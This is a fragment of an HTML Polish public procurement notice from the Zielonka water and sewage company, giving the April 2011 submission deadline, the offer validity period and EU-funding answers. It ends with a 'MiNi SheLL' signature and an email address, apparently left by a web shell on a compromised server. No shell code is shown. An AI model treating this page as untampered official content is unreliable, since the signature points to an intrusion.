05-220  Zielonka,  ul. Literacka 20.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2011 godzina 10:00, miejsce: Sekretariat  ( pok. 24 ) Przedsiębiorstwa Wodociągów i Kanalizacji w Zielonce Spółka z o.o.  przy ul. Literackiej 20, 05-220 Zielonka.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com